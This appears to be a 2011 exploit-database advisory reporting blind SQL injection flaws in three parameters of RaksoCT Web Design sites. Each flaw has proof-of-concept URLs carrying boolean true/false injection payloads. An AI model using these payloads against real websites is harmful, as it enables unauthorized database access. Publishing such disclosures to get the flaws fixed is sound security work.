RaksoCT Multiple SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RaksoCT Multiple SQL Injection Vulnerabilities
# Published : 2011-02-25
# Author : p0pc0rn
# Previous Title : Joomla XCloner Component (com_xcloner-backupandrestore) Remote Command Execution
# Next Title : DO-CMS Multiple SQL Injection Vulnerabilities

Title        : RaksoCT Web Design Vulnerable to Multiples SQL Injection
Web        : http://raksoct.com/
Found By : p0pc0rn 25/02/2011

Blind SQL
----------
1 - Parameter gallery_details.asp?a_id=[Blind SQL]

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE

2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE

3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE